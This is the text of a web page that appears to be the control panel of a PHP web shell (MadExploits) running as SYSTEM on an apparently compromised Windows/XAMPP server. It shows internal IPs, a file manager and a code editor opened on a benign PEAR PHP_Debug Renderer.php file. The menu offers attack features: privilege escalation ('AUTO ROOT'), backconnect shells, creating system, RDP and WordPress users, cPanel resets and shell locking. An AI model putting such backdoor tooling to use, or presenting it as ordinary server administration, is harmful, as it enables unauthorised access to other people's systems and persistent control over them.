Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
pear /
PHP /
Debug /
[ HOME SHELL ]
Name
Size
Permission
Action
Renderer
[ DIR ]
drwxrwxrwx
Renderer.php
1.28
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Renderer.php
<?php require_once 'PHP/Debug/Renderer/Common.php'; /** * A loader class for the renderers. * * @package PHP_Debug * @category PHP * @author Loic Vernet <qrf_coil at yahoo dot fr> * @since V2.0.0 - 10 Apr 2006 * * @package PHP_Debug * @filesource * @version CVS: $Id: Renderer.php,v 1.1 2008/05/02 14:26:37 c0il Exp $ */ class PHP_Debug_Renderer { /** * Attempt to return a concrete Debug_Renderer instance. * * @param string $mode Name of the renderer. * @param array $options Parameters for the rendering. * @access public */ public static function factory($debugObject, $options) { $className = 'PHP_Debug_Renderer_'. $options['render_type']. '_'. $options['render_mode']; $classPath = 'PHP/Debug/Renderer/'. $options['render_type']. '/'. $options['render_mode']. '.php'; include_once $classPath; if (class_exists($className)) { $obj = new $className($debugObject, $options); } else { include_once 'PEAR.php'; PEAR::raiseError('PHP_Debug: renderer >' . $options['DEBUG_render_mode'] . '< not found', true); return NULL; } return $obj; } }
Close